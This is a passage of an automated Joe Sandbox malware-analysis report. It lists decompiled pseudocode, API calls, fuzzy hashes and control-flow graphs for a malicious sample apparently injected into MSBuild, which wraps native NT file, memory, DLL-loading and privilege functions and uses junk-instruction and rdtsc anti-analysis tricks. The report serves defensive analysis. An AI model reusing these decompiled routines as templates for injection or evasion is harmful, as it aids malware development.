                                            				void* _t27;
                                            				intOrPtr* _t28;
                                            
                                            				_t13 = _a4;
                                            				_t28 = _a4 + 0xc48;
                                            				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                            				_t4 =  &_a40; // 0x414a31
                                            				_t6 =  &_a32; // 0x414d72
                                            				_t12 =  &_a8; // 0x414d72
                                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                            				return _t18;
                                            			}







                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 216 40acf0-40ad19 call 41cc50 219 40ad1b-40ad1e 216->219 220 40ad1f-40ad2d call 41d070 216->220 223 40ad3d-40ad4e call 41b4a0 220->223 224 40ad2f-40ad3a call 41d2f0 220->224 229 40ad50-40ad64 LdrLoadDll 223->229 230 40ad67-40ad6a 223->230 224->223 229->230
                                            C-Code - Quality: 100%
                                            			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                            				char* _v8;
                                            				struct _EXCEPTION_RECORD _v12;
                                            				struct _OBJDIR_INFORMATION _v16;
                                            				char _v536;
                                            				void* _t15;
                                            				struct _OBJDIR_INFORMATION _t17;
                                            				struct _OBJDIR_INFORMATION _t18;
                                            				void* _t30;
                                            				void* _t31;
                                            				void* _t32;
                                            
                                            				_v8 =  &_v536;
                                            				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                            				_t31 = _t30 + 0xc;
                                            				if(_t15 != 0) {
                                            					_t17 = E0041D070(__eflags, _v8);
                                            					_t32 = _t31 + 4;
                                            					__eflags = _t17;
                                            					if(_t17 != 0) {
                                            						E0041D2F0( &_v12, 0);
                                            						_t32 = _t32 + 8;
                                            					}
                                            					_t18 = E0041B4A0(_v8);
                                            					_v16 = _t18;
                                            					__eflags = _t18;
                                            					if(_t18 == 0) {
                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                            						return _v16;
                                            					}
                                            					return _t18;
                                            				} else {
                                            					return _t15;
                                            				}
                                            			}














                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 231 41a360-41a376 232 41a37c-41a3b1 NtCreateFile 231->232 233 41a377 call 41af60 231->233 233->232
                                            C-Code - Quality: 100%
                                            			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                            				long _t21;
                                            				void* _t31;
                                            
                                            				_t3 = _a4 + 0xc40; // 0xc40
                                            				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                            				return _t21;
                                            			}






                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 234 41a35c-41a3b1 call 41af60 NtCreateFile
                                            C-Code - Quality: 100%
                                            			E0041A35C(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                            				void* _v1957322415;
                                            				long _t24;
                                            				void* _t34;
                                            
                                            				_t18 = _a4;
                                            				_t6 = _t18 + 0xc40; // 0xc40
                                            				E0041AF60(_t34, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                            				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                            				return _t24;
                                            			}







                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: d5fd802cd099293d90e5be68870130880bb6f6ed2b4100c3cab1e95151a04313
                                            • Instruction ID: 55409e79fc2e87cdf0968eebe0caa966a520e268ff113b4a8c1e9e07595b87bb
                                            • Opcode Fuzzy Hash: d5fd802cd099293d90e5be68870130880bb6f6ed2b4100c3cab1e95151a04313
                                            • Instruction Fuzzy Hash: 4F01B6B2201108AFCB18CF99DC84EEB77A9AF8C754F158248FA1D97281C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 243 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                            C-Code - Quality: 100%
                                            			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t14;
                                            				void* _t21;
                                            
                                            				_t3 = _a4 + 0xc60; // 0xca0
                                            				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t14;
                                            			}






                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 240 41a53b-41a556 241 41a55c-41a57d NtAllocateVirtualMemory 240->241 242 41a557 call 41af60 240->242 242->241
                                            C-Code - Quality: 44%
                                            			E0041A53B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t14;
                                            				void* _t21;
                                            
                                            				asm("repne pop es");
                                            				asm("insd");
                                            				asm("aaa");
                                            				asm("adc eax, 0x8bec8b55");
                                            				_t10 = _a4;
                                            				_t3 = _t10 + 0xc60; // 0xca0
                                            				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t14;
                                            			}






                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: bf7953acd6946ffe089385244b191812051a925c36ddffc8886a4cb0abef713a
                                            • Instruction ID: 3f19b4fe07fa76ac8c37c26cef0bfdfe33b4653fa11a24b21d80f346022d125d
                                            • Opcode Fuzzy Hash: bf7953acd6946ffe089385244b191812051a925c36ddffc8886a4cb0abef713a
                                            • Instruction Fuzzy Hash: AFF01CB51041496BCB14DF98DC85CE7B7A9AF88214B15865AF95C97202C234E8558BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 255 41a490-41a4b9 call 41af60 NtClose
                                            C-Code - Quality: 100%
                                            			E0041A490(intOrPtr _a4, void* _a8) {
                                            				long _t8;
                                            				void* _t11;
                                            
                                            				_t5 = _a4;
                                            				_t2 = _t5 + 0x10; // 0x300
                                            				_t3 = _t5 + 0xc50; // 0x40a943
                                            				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                            				_t8 = NtClose(_a8); // executed
                                            				return _t8;
                                            			}






                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bed87b789fcc86fa34e009be4ee33806e96cb250caca0913ee97bed4a9526e5a
                                            • Instruction ID: a9996617ed2bc7e032d19f5aa99bfa5d1e0c47e3a77cf3a105cd71ea5b93cfd8
                                            • Opcode Fuzzy Hash: bed87b789fcc86fa34e009be4ee33806e96cb250caca0913ee97bed4a9526e5a
                                            • Instruction Fuzzy Hash: 5A9002B120100903D281719984047470509E7D0341F51C012A9454554EC6998DD577A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 36dc1ad7bb9631e3f8ca9721b1f0f3b753f05c44a23af69a34528375787aa053
                                            • Instruction ID: 3a0f7c5beb4d66168110a502dbe93d63e37cf19ab8fe057f109bcb38334c159b
                                            • Opcode Fuzzy Hash: 36dc1ad7bb9631e3f8ca9721b1f0f3b753f05c44a23af69a34528375787aa053
                                            • Instruction Fuzzy Hash: C290027120100903D24165D994086470509E7E0341F51D012A9414555EC6A588D17271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 250742a6c220fabe55a0432ccaac2d98bd7f98d7ed06352d254aea881ce25944
                                            • Instruction ID: 37f50a4ed66da41d77b6398fb7c698bd4ba011e790dd1911208d525c1c161e9b
                                            • Opcode Fuzzy Hash: 250742a6c220fabe55a0432ccaac2d98bd7f98d7ed06352d254aea881ce25944
                                            • Instruction Fuzzy Hash: 4790026921300503D2C17199940860B0509E7D1242F91D416A4405558CC95588A96361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 491d788c7c82ec4cd8a77e81f38e6f200e3f43bef0d3339d251a6225107923ee
                                            • Instruction ID: 227d072092580dffc09bdede7167e5b216828522fb3bdb32b2c8c18cd6a37178
                                            • Opcode Fuzzy Hash: 491d788c7c82ec4cd8a77e81f38e6f200e3f43bef0d3339d251a6225107923ee
                                            • Instruction Fuzzy Hash: AF90026130100503D281719994186074509F7E1341F51D012E4804554CD95588966362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5e811764450a25874605942fac5997d8d1b1461828cd70e368e335338d42345c
                                            • Instruction ID: 8f101b3a1462a376dbe469decf378b4fb9853180ea5209b5cf03fc96f2a82dad
                                            • Opcode Fuzzy Hash: 5e811764450a25874605942fac5997d8d1b1461828cd70e368e335338d42345c
                                            • Instruction Fuzzy Hash: D990027120100D03D2C17199840464B0509E7D1341F91C016A4415654DCA558A9977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2cc235221d13182e80cd2cf86a7f686b70ff405ddaea6c4dfceccabd9e99403d
                                            • Instruction ID: 7102b8c87034efb622dfb6571ffebee7895a79f088bdc972458667b7de9b2009
                                            • Opcode Fuzzy Hash: 2cc235221d13182e80cd2cf86a7f686b70ff405ddaea6c4dfceccabd9e99403d
                                            • Instruction Fuzzy Hash: 0990027120108D03D2516199C40474B0509E7D0341F55C412A8814658DC6D588D17261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00409AB0(intOrPtr* _a4) {
                                            				intOrPtr _v8;
                                            				char _v24;
                                            				char _v284;
                                            				char _v804;
                                            				char _v840;
                                            				void* _t24;
                                            				void* _t31;
                                            				void* _t33;
                                            				void* _t34;
                                            				void* _t39;
                                            				void* _t50;
                                            				intOrPtr* _t52;
                                            				void* _t53;
                                            				void* _t54;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t52 = _a4;
                                            				_t39 = 0; // executed
                                            				_t24 = E00407EA0(_t52,  &_v24); // executed
                                            				_t54 = _t53 + 8;
                                            				if(_t24 != 0) {
                                            					E004080B0( &_v24,  &_v840);
                                            					_t55 = _t54 + 8;
                                            					do {
                                            						E0041BE10( &_v284, 0x104);
                                            						E0041C480( &_v284,  &_v804);
                                            						_t56 = _t55 + 0x10;
                                            						_t50 = 0x4f;
                                            						while(1) {
                                            							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                                            							_t56 = _t56 + 0x10;
                                            							if(_t31 != 0) {
                                            								break;
                                            							}
                                            							_t50 = _t50 + 1;
                                            							if(_t50 <= 0x62) {
                                            								continue;
                                            							} else {
                                            							}
                                            							goto L8;
                                            						}
                                            						_t9 = _t52 + 0x14; // 0xffffe045
                                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                            						_t39 = 1;
                                            						L8:
                                            						_t33 = E004080E0( &_v24,  &_v840);
                                            						_t55 = _t56 + 8;
                                            					} while (_t33 != 0 && _t39 == 0);
                                            					_t34 = E00408160(_t52,  &_v24); // executed
                                            					if(_t39 == 0) {
                                            						asm("rdtsc");
                                            						asm("rdtsc");
                                            						_v8 = _t34 - 0 + _t34;
                                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                            					}
                                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                            					_t20 = _t52 + 0x31; // 0x5608758b
                                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                            					return 1;
                                            				} else {
                                            					return _t24;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 3 41a630-41a661 call 41af60 RtlAllocateHeap
                                            C-Code - Quality: 100%
                                            			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                            				void* _t10;
                                            				void* _t15;
                                            
                                            				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                            				_t6 =  &_a8; // 0x414536
                                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                            				return _t10;
                                            			}

                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 201 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a480 210->212 213 40838d 210->213 212->213 213->211
                                            C-Code - Quality: 82%
                                            			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t12;
                                            				intOrPtr* _t13;
                                            				int _t14;
                                            				long _t21;
                                            				intOrPtr* _t25;
                                            				void* _t26;
                                            				void* _t30;
                                            
                                            				_t30 = __eflags;
                                            				_v68 = 0;
                                            				E0041BE60( &_v67, 0, 0x3f);
                                            				E0041CA00( &_v68, 3);
                                            				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                                            				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                            				_t25 = _t13;
                                            				if(_t25 != 0) {
                                            					_t21 = _a8;
                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                            					_t32 = _t14;
                                            					if(_t14 == 0) {
                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                            					}
                                            					return _t14;
                                            				}
                                            				return _t13;
                                            			}

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 237 41a7c1-41a7ea call 41af60 239 41a7ef-41a804 LookupPrivilegeValueW 237->239
                                            C-Code - Quality: 25%
                                            			E0041A7C1(void* __eax, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                            				void* _v117;
                                            				int _t13;
                                            				void* _t20;
                                            
                                            				asm("aam 0xac");
                                            				asm("std");
                                            				asm("out dx, eax");
                                            				asm("sbb al, 0x7a");
                                            				asm("out 0x80, al");
                                            				asm("enter 0x5799, 0xff");
                                            				_t10 = _a4;
                                            				E0041AF60(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                            				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                            				return _t13;
                                            			}

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 98f29c0fe56ab57662b43daf8e9872967a0ae3dad624b545ce3177a85e3d58e0
                                            • Instruction ID: 903d9b1558472719a7454343ffe1c0d941e057e6130617f6b0d07f0e0b71f619
                                            • Opcode Fuzzy Hash: 98f29c0fe56ab57662b43daf8e9872967a0ae3dad624b545ce3177a85e3d58e0
                                            • Instruction Fuzzy Hash: BDF0A0B16002086FDB10EF75CC80EDB3B69AF45254F108568F94D97242C935D415CBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 246 41a670-41a6a1 call 41af60 RtlFreeHeap
                                            C-Code - Quality: 100%
                                            			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                            				char _t10;
                                            				void* _t15;
                                            
                                            				_t3 = _a4 + 0xc74; // 0xc74
                                            				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 249 41a7d0-41a7e9 250 41a7ef-41a804 LookupPrivilegeValueW 249->250 251 41a7ea call 41af60 249->251 251->250
                                            C-Code - Quality: 100%
                                            			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                            				int _t10;
                                            				void* _t15;
                                            
                                            				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}





                                            0x0041a7ea
                                            0x0041a800
                                            0x0041a804

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
